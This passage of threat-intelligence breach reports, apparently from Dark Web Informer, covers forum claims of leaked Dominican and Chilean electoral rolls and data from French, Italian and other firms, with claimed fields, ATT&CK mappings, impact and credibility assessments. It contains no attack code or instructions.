GB of JPEGs**, with a 500,000 record sample published openly. **No price is stated**, only a messenger contact. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Citizens7,141,313 ID photographs5,758,124 Image data19.4 GB ActorGordonFreeman ### ▣Post details TargetJunta Central Electoral CountryDominican Republic SectorElectoral authority ListingNo price stated Volume7,141,313 records Formats.DB and JPEG ObservedAug 24, 2026 ActorGordonFreeman ### !What the post claims - 7,141,313 citizen records - 5,758,124 ID photographs - 573 MB database file - 19.4 GB of images - Cédula numbers - Record validity flag - Given names and surnames - Civil status - Dates of birth - Sex - Place of birth - Blood type - Occupation - Photos keyed to cédula - 500,000 record sample - Direct breach of JCE claimed - No mechanism described ### ◱Screenshots [ ![Forum post claiming a breach of the Dominican Republic central electoral board, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1978235978623957629387569876235968723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1978235978623957629387569876235968723.png) [ ![Sample of identity card photographs included in the post, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1978235978623957629387569876235968724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1978235978623957629387569876235968724.png) [ ![Further sample of identity card photographs included in the post, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1978235978623957629387569876235968725.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1978235978623957629387569876235968725.png) [ ![Closing section of the post stating file sizes and formats, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1978235978623957629387569876235968726.png) Screenshot 4 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1978235978623957629387569876235968726.png) Forum post publishing data attributed to the Junta Central Electoral, observed 24 August 2026. ### ☷Mapped techniques The actor asserts a direct breach but describes no method. Entries below are inferred from the artefacts unless marked otherwise. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated The actor describes extracting citizen records directly from the electoral board's system. - Collection [T1530](https://attack.mitre.org/techniques/T1530/) Data from cloud storage Inferred Nearly six million JPEGs named by cédula indicate a separate image store was reached alongside the database. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred The sample is distributed through a public file host. The route out of the environment is not described. ### ⚠Potential impact The photographs are what separate this from a normal registry leak. A cédula number with a full name and date of birth is **an identity record**; the same thing with the holder's **official identity card portrait attached to it** is a working identity kit, and it arrives at a scale covering most of the adult population. Remote onboarding at banks, telecoms and wallet providers frequently rests on a photograph of an identity document plus a selfie, and a genuine portrait tied to a genuine number weakens the weaker end of that market considerably. None of it can be reissued: **a face cannot be rotated and a cédula rarely changes**. The record fields add their own problems. **Blood type is health data**, place of birth and civil status feed the security questions that call centres still use, and occupation allows a set this size to be sorted into targets worth pursuing. The near complete coverage also means the useful question is not who is exposed but **which institutions still treat cédula and name as proof of identity**, because for those, this set is the end of that assumption. ### iStatus Unverified Unlike the same actor's Chilean listing published a day earlier, **this data has no plausible public source**. Electoral rolls are often published in some form; official identity card portraits held against cédula numbers are not, so if the images are genuine they came from somewhere they should not have. That makes the sample a **far stronger test here**, and anyone who can match a handful of images to the right people has effectively confirmed the set. What remains entirely unsupported is the **breach claim itself**, since no method, date or access route is given, and registry data from the region has circulated before, so overlap with older sets should be ruled out before this is treated as new. The account is **established, with a substantial history and a paid rank**, and this is its **second national registry claim in as many days**, which is either a run of genuine access or a pattern worth being sceptical of. Dark Web Informer has **not retrieved the data and is not linking it**, nor the contact address. The JCE has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=jce-dominican-republic-2026-08-24&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=jce-dominican-republic-2026-08-24&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=jce-dominican-republic-2026-08-24&utm%5Fcontent=footer) // Threat Intelligence ### Agence Vauban Client Accounts and Property Files Shared Free on a Forum URL: https://darkwebinformer.com/agence-vauban-client-accounts-and-property-files-shared-free-on-a-forum/ Last updated: 2026-08-25T15:27:12.000Z Breach Report France Real Estate Shared Free ## Agence Vauban Client Accounts and Property Files Shared Free on a Forum A forum user posting as **sh444d0w** has published what they describe as the database of **Agence Vauban**, a real estate agency working the Antibes and French Riviera market. The post lists **5,430 user accounts** with names, logins, emails, phone numbers and addresses, alongside a full table list covering **property records, valuations, financing and expenses, rental agreements, floor plans and photographs**. The published sample shows passwords stored as **bcrypt hashes rather than plaintext**. The data is **not for sale** and the account posting it was created the same month with no history. The claim is **unverified**. Severity MODERATE [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) User accounts5,430 PasswordsBcrypt DistributionFree Actorsh444d0w ### ▣Post details TargetAgence Vauban CountryFrance SectorReal estate agency ListingShared, no price Volume5,430 user accounts Stated sourceNot described ObservedAug 24, 2026 Actorsh444d0w ### !What the post claims - 5,430 user accounts - Names and login handles - Email addresses - Bcrypt password hashes - Phone and mobile numbers - Street, postcode, city, country - Roles and permissions - Password reset records - Remember me tokens - Property records and prices - Owner or agent per property - Interior and exterior detail - Surface areas - Addresses and coordinates - Financing and expenses - Profitability figures - Rental agreements - Floor plans and photographs ### ◱Screenshots [ ![Forum post publishing a database attributed to the French real estate agency Agence Vauban, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/479823576823578698723546968723598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/479823576823578698723546968723598723.png) [ ![Second section of the same post listing user table columns and showing a redacted sample, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/479823576823578698723546968723598724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/479823576823578698723546968723598724.png) Forum post publishing Agence Vauban data, observed 24 August 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred A complete table list including permissions, tokens and reset records indicates a full schema export rather than a scrape of a public listings page. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution runs through the forum and a messenger contact. The route out of the environment is not described. ### ⚠Potential impact Five thousand accounts is small, and the credentials are the least of it, since **bcrypt hashing means these are not directly usable** and only weak passwords will fall to cracking. The risk sits in the property side of the schema. An agency database of this type ties **an owner to an address, a valuation, a set of financials and, in this case, floor plans and photographs**, which is an unusually complete picture of a specific building and who holds it. On the Riviera, where a meaningful share of the stock is **second homes and rentals that stand empty for much of the year**, that combination has an obvious physical application, and occupancy is inferable from the rental agreements. The commercial risk is **transaction fraud**. Property purchases involve large transfers between parties who mostly communicate by email, and an approach that quotes the correct property, the correct price and the correct agent is the hardest kind to detect. Anyone who has bought, sold or rented through this agency should treat payment instructions arriving by email as suspect until confirmed by phone. ### iStatus Unverified The sample is **structurally convincing**. Table and column naming, the presence of remember me tokens and password reset records, and bcrypt hashes at a standard cost factor are all consistent with a real application backend rather than something assembled by hand. That said, **a set this small is also cheap to fabricate**, hashes can be generated for any password, and structure alone proves a schema was copied rather than that this particular agency was compromised. The account is **brand new, one post, one thread, no reputation**, and the data is given away rather than sold, so there is no price to defend and no track record to weigh. **No intrusion method, no date and no access route are described anywhere in the post.** Dark Web Informer has **not retrieved the data and is not linking it**, nor the contact address. Agence Vauban has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=agence-vauban-2026-08-24&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=agence-vauban-2026-08-24&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=agence-vauban-2026-08-24&utm%5Fcontent=footer) // Threat Intelligence ### Electoral Roll Data on 13.7 Million Chileans Advertised as a Complete Database URL: https://darkwebinformer.com/electoral-roll-data-on-13-7-million-chileans-advertised-as-a-complete-database/ Last updated: 2026-08-25T15:07:36.000Z Breach Report Chile Government No Price Stated ## Electoral Roll Data on 13.7 Million Chileans Advertised as a Complete Database A forum user posting as **GordonFreeman** is advertising what they describe as the complete electoral roll of Chile, listing **13,737,519 citizens** and attributing it to **SERVEL**, the national electoral service. The stated field list covers **full names split into paternal and maternal surnames, RUT national identity numbers with check digits, sex, registered address, region, province, commune and municipality**, along with the **electoral district and polling table** each voter is assigned to. The file is given as **3.35 GB in .DB format**, with a 500,000 record sample published openly. **No price is stated**, only a messenger contact. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Citizens13,737,519 Size3.35 GB Format.DB ActorGordonFreeman ### ▣Post details TargetSERVEL CountryChile SectorElectoral authority ListingNo price stated Volume13,737,519 records Format.DB, 3.35 GB ObservedAug 24, 2026 ActorGordonFreeman ### !What the post claims - 13,737,519 citizens - 3.35 GB in .DB format - Given names and both surnames - RUT national ID numbers - RUT check digits - Sex field - Registered addresses - Region and province - Commune and municipality - Electoral district - Assigned polling table - Attributed to SERVEL - 500,000 record sample - No mechanism described ### ◱Screenshot [ ![Forum listing advertising an alleged Chilean electoral roll database of 13.7 million citizens, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/23876956789235798293875798235978251.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/23876956789235798293875798235978251.png) Forum post advertising Chilean electoral roll data, observed 24 August 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred A single database file with a uniform schema points to an export rather than an assembled set. Whether the source was an internal system or a published roll is not established. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred The sample is distributed through a public file host. The route out of any environment is not described. ### ⚠Potential impact At 13.7 million records this covers **essentially the entire voting age population of Chile**, which makes the usual question of whether a given person is affected close to meaningless. The field that carries the weight is the **RUT**, because it is the single identifier used across Chilean banking, telecoms, healthcare and public services, and it is **not something a citizen can change**. Paired with a full name and a registered address, it is the standard starting point for account opening fraud and for the identity checks that call centres still perform verbally. The electoral fields are a separate concern: **district and polling table place every named individual geographically** at a resolution useful for targeted political messaging, and in combination with an address, for physical targeting of anyone whose safety depends on not being locatable. The important caveat is that **parts of the Chilean electoral roll are published by law** for public review, so a set like this may represent aggregation of public records rather than a system compromise. That distinction changes the response entirely but does not much change the exposure, since the aggregation is what creates the risk. ### iStatus Unverified The post asserts the data was **obtained from SERVEL and offers nothing to support it**, describing no intrusion, no date and no access route. That matters more here than in most listings, because Chile **publishes electoral roll extracts for public consultation**, which means a sample that checks out against reality would demonstrate the data is genuine without demonstrating that anything was breached. Verification against the sample is therefore **a weak test of the central claim**, and any reporting that treats a matching record as proof of a compromise is going further than the evidence allows. The account is **established rather than new**, with a substantial posting history and a paid forum rank. No price is given, which is unusual and may indicate the set is being used to build standing rather than sold. Dark Web Informer has **not retrieved the sample and is not linking it**, nor the contact address. SERVEL has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=servel-chile-2026-08-24&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=servel-chile-2026-08-24&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=servel-chile-2026-08-24&utm%5Fcontent=footer) // Threat Intelligence ### Groupe Bernard Data Published Free as the Thirteenth Leak From One Platform URL: https://darkwebinformer.com/groupe-bernard-data-published-free-as-the-thirteenth-leak-from-one-platform/ Last updated: 2026-08-24T17:30:21.000Z Breach Report France Agriculture Published Free ## Groupe Bernard Data Published Free as the Thirteenth Leak From One Platform A forum user posting as **NikolaT** has published what they describe as the database of **Groupe Bernard**, a French group working in grain, animal nutrition and agriculture, giving a size of **22.25 GB across 330,563 files**. The post presents it as **the thirteenth in a running series drawn from a shared platform the actor calls BlgCloud**, and announces a fourteenth against a named French company still to come. Samples cover three distinct layers: **CRM records for companies, document metadata for invoices and delivery notes, and application user accounts**. The data is **not for sale**, with download links released to anyone who replies to the thread. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Size22.25 GB Files330,563 DistributionFree ActorNikolaT ### ▣Post details Targetbernard-groupe.com CountryFrance SectorAgriculture ListingFree, reply to unlock Volume22.25 GB, 330,563 files Stated sourceShared platform ObservedAug 24, 2026 ActorNikolaT ### !What the post claims - 22.25 GB of data - 330,563 files - Thirteenth in a series - Fourteenth already announced - Next target named - CRM company records - Registered addresses - Company and VAT numbers - Business phone numbers - Geographic coordinates - Bank account fields - Invoices and delivery notes - Work orders - Stored file hashes and paths - Application user accounts - Corporate email addresses - Password fields empty in sample - Access and reset timestamps ### ◱Screenshots [ ![Forum post publishing data attributed to Groupe Bernard as part of a series of platform leaks, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/628379569827356987236597823569872931.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/628379569827356987236597823569872931.png) [ ![Further sample sections of the same post covering document metadata and user accounts, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/628379569827356987236597823569872932.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/628379569827356987236597823569872932.png) Forum post publishing Groupe Bernard data, observed 24 August 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1199](https://attack.mitre.org/techniques/T1199/) Trusted relationship Stated The data is attributed to a shared platform serving many companies rather than to the named company itself. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Samples show CRM objects, document records and user tables exported together from one application. - Collection [T1530](https://attack.mitre.org/techniques/T1530/) Data from cloud storage Inferred Document entries carry storage paths and file hashes, and the file count far exceeds what a database export alone would produce. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Distribution is through forum hosted links. The route out of the environment is not described. ### ⚠Potential impact This is **business data rather than consumer data**, and the exposure runs outward from the named company rather than inward. The CRM layer describes **the customers, suppliers and sites Groupe Bernard trades with**, down to registered addresses, company numbers and coordinates, while the document layer is full of **invoices, purchase orders and delivery notes**. That pairing is the raw material for invoice fraud, because an approach that quotes a genuine order reference and a real contact at a real supplier is very hard for an accounts department to reject. The user table adds **working corporate addresses and account activity dates**, and although password fields are empty in the sample, knowing who has an account and when they last used it is enough to build a convincing internal lure. The more serious point is the framing: if **thirteen companies have been published from one platform and a fourteenth is announced**, then the platform is the incident and every other client of it should be treating this as their problem too. Because the data is **free rather than sold, it will spread immediately**. ### iStatus Unverified Nothing is being sold here, which removes the usual incentive to inflate, though it introduces a different one, since a numbered series builds a reputation and **reputation is the currency the actor is actually collecting**. The samples are the strongest element: three separate layers, with internally consistent identifiers, timestamps spanning years, storage paths and file hashes, all of which would be **laborious to fabricate at this depth** and are checkable against reality by anyone who downloads the set. Against that, the central claim, that this came from a shared platform rather than from the company, **rests entirely on the actor's word**, and the platform they name is not one with an obvious public footprint. The account is **established rather than new**, with a numbered series behind it. Dark Web Informer has **not retrieved the files and is not linking them**. Neither Groupe Bernard nor any platform provider has publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=groupe-bernard-2026-08-24&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=groupe-bernard-2026-08-24&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=groupe-bernard-2026-08-24&utm%5Fcontent=footer) // Threat Intelligence ### YouFid Loyalty Profiles on 1.9 Million French Customers Offered for 1,000 Euros URL: https://darkwebinformer.com/youfid-loyalty-profiles-on-1-9-million-french-customers-offered-for-1-000-euros/ Last updated: 2026-08-24T16:36:47.000Z Breach Report France Loyalty Platform 1,000 EUR ## YouFid Loyalty Profiles on 1.9 Million French Customers Offered for 1,000 Euros A forum user posting as **Lagui1337** is selling what they describe as the user database of **YouFid**, a French customer loyalty platform used by restaurant and retail merchants. The listing gives a precise figure of **1,899,454 rows in JSONL format** and, unusually, publishes **field fill rates** alongside the field list, putting email at around 99 percent, phone at 49 percent, names at 33 percent, dates of birth at 23 percent and street addresses at 0.2 percent. Loyalty specific fields including **QR card code, scan count and registration date are stated as complete**, with the first merchant visited present on around 87 percent of records. A 1,000 line sample is published. The asking price is **1,000 euros in cryptocurrency**. The claim is **unverified**. Severity HIGH [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Rows1,899,454 Email fill99% Price1,000 EUR ActorLagui1337 ### ▣Post details TargetYouFid CountryFrance SectorCustomer loyalty ListingSelling, crypto only Volume1,899,454 rows FormatJSONL ObservedAug 24, 2026 ActorLagui1337 ### !What the post claims - 1,899,454 rows - JSONL format - First and last names - Email addresses - Phone numbers - Dates of birth - Street, city, postal code - QR loyalty card codes - First merchant visited - Number of scans - Registration dates - Email fill about 99% - Phone fill about 49% - Name fill about 33% - Date of birth fill about 23% - Address fill about 0.2% - Loyalty fields near complete - 1,000 line sample published ### ◱Screenshot [ ![Forum listing selling an alleged YouFid loyalty database of 1.9 million French customer profiles, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/329735829738569872635987623598762395871.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/329735829738569872635987623598762395871.png) Forum post offering the YouFid loyalty database for sale, observed 24 August 2026. ### ☷Mapped techniques The post describes no intrusion method. Both entries are inferred from the artefacts, not stated. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Inferred A row count to the unit and per field fill rates point to a complete export from a single store rather than a partial or scraped set. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Samples are distributed through a public paste host. The route out of the environment is not described. ### ⚠Potential impact Loyalty data reads as low stakes and is not, because of what sits next to it. There are **no passwords and no payment details here**, and the address field is effectively empty, so this is not an identity theft set. What it is instead is **an almost complete email list of nearly 1.9 million French consumers**, half of them with a phone number, and each one attached to **the merchant they actually visited** and how often they scanned. That combination is what makes it valuable, because a lure referencing the right chain, in French, quoting a real loyalty card code and a plausible points balance is a different proposition to generic spam. The **QR card codes being stated as complete** is the part worth watching, since loyalty codes are frequently the only thing presented at a till, and if they can be replayed the fraud is against the merchants rather than the customers. The low asking price relative to volume also matters: **at this price the data will circulate widely**, which usually means it ends up free within months. ### iStatus Unverified The listing is **specific in the ways that are cheap to fake and vague in the ways that matter**. Publishing per field fill rates is unusual and suggests the actor has actually handled the file, since those numbers are awkward to invent consistently and easy to disprove against the published sample. Against that, **no intrusion method is described at all**, there is no date for the compromise, and nothing indicates whether the data is current or several years old. The account is **new, with a single thread**, and the post opens with group branding and bravado rather than evidence. The named restaurant chains are **the actor's characterisation of who uses the platform**, not a claim that those companies were themselves breached, and should not be read as one. A 1,000 line sample is publicly downloadable and would settle the field question, though Dark Web Informer has **not retrieved it and is not linking it**, nor the contact address. YouFid has not publicly addressed the claim. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=youfid-2026-08-24&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=youfid-2026-08-24&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=youfid-2026-08-24&utm%5Fcontent=footer) // Threat Intelligence ### 6.1 TB of Italian School Documents Offered for Sale as Spaggiari Disputes the Scope URL: https://darkwebinformer.com/6-1-tb-of-italian-school-documents-offered-for-sale-as-spaggiari-disputes-the-scope/ Last updated: 2026-08-23T21:33:25.000Z Breach Report Italy Education Software 50,000 USD ## 6.1 TB of Italian School Documents Offered for Sale as Spaggiari Disputes the Scope A forum user posting as **xpl0itrs** is selling what they describe as **6.1 TB of documents** taken from **Gruppo Spaggiari Parma**, a long established Italian supplier of school administration software. The post lists **identity cards, tax and income documents, diplomas, driving licences, report cards, prescriptions, medical and paediatric certificates and vaccination records**, and characterises the set as a document dump rather than a structured database. Samples are published openly. The actor states they are **publishing because negotiation with the company failed**, and quotes Spaggiari's own statement, which acknowledges an event but confines it to a forms component and **excludes the register and school management systems**. The asking price is **50,000 dollars**. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel, dark web exposure monitoring](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Volume6.1 TB Price$50,000 Document typesThirteen Actorxpl0itrs ### ▣Post details TargetGruppo Spaggiari Parma CountryItaly SectorEducation software ListingSelling, 50,000 USD Volume6.1 TB of files Stated sourceDirect compromise ObservedAug 23, 2026 Actorxpl0itrs ### !What the post claims - 6.1 TB of documents - Identity cards - Driving licences - Tax documents - Codice fiscale documents - ISEE income statements - Diploma certificates - School report cards - Medical certificates - Paediatric medical files - Prescriptions - Vaccination records - CV and job applications - Two samples of each type - Further types not listed - Negotiation said to have failed ### ◱Screenshots [ ![Forum listing offering 6.1 TB of documents attributed to Gruppo Spaggiari Parma, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173651.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173651.png) [ ![Sample documents included in the listing, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173652.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173652.png) [ ![Further sample documents included in the listing, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173653.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173653.png) [ ![Additional sample documents included in the listing, shown redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173654.png) Screenshot 4 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173654.png) [ ![Section of the listing quoting the company response and stating a price of 50,000 dollars](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173655.png) Screenshot 5 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/1247891623549876234598725364978982173655.png) Forum post offering Gruppo Spaggiari Parma documents for sale, observed 23 August 2026. ### ☷Mapped techniques Mapped from the actor's own account. Claimed, not confirmed. - Initial access [T1190](https://attack.mitre.org/techniques/T1190/) Exploit public facing application Inferred The company locates the event in a web component used to compile and submit forms. The actor describes no mechanism at all. - Collection [T1213](https://attack.mitre.org/techniques/T1213/) Data from information repositories Stated Described as a document dump spanning many file categories rather than a table export. - Exfiltration [T1567](https://attack.mitre.org/techniques/T1567/) Exfiltration over web service Inferred Samples are hosted on an actor controlled site. The route out of the environment is not described. - Impact [T1657](https://attack.mitre.org/techniques/T1657/) Financial theft Stated The actor says files were sent to the company first and that publication followed a failed negotiation. ### ⚠Potential impact A school administration supplier collects documents from families rather than from customers, which is what makes this set unusual. The categories named include **paediatric medical files, prescriptions, vaccination records and report cards**, so a meaningful share of the people in it are **children**, and the exposure will outlast their school years by decades. Alongside those sit **ISEE income declarations**, which describe household finances in detail, and photographed identity cards and driving licences. Scanned identity documents are the component that matters most, because they support account opening and lending checks in a way a leaked password never does, and unlike a password **a national identity card cannot be rotated**. The actor makes the fraud application explicit in the post. There is also a dispute worth watching over **whether the compromised component touched the register and school management systems**, which the company denies, because the answer determines whether this affects the schools using one product or every family who ever submitted a form through it. ### iStatus Unverified Unusually for a listing of this kind, **the target has already responded in public**, and the post quotes that response in full. The company confines the incident to a forms component and states that its register and school management systems are separate and unaffected, while noting that attributions to other platforms are not supported by its analysis. The actor treats that as evasive and published **a named individual's records to demonstrate the depth of the set**, which Dark Web Informer will not reproduce. So the existence of an incident is not really in question here, only its **perimeter**, and the two accounts cannot both be right. The volume, the file categories and the actor's motive are all **uncorroborated and come from the party trying to sell the data**. Dark Web Informer has **not retrieved the samples and is not linking them**, nor the contact addresses. Want everything on this breach? **Paid subscribers** get the full unredacted claim details and more. After subscribing, check out the [threat feed](https://darkwebinformer.com/threat-feed/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=spaggiari-parma-2026-08-23&utm%5Fcontent=threat-feed) and search there for this alert. [View pricing →](https://darkwebinformer.com/pricing?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=spaggiari-parma-2026-08-23&utm%5Fcontent=pricing-button) [Dark Web Informer](https://darkwebinformer.com/?utm%5Fsource=alert&utm%5Fmedium=card&utm%5Fcampaign=spaggiari-parma-2026-08-23&utm%5Fcontent=footer) // Threat Intelligence ### French Police File Queries Allegedly Taken Through the 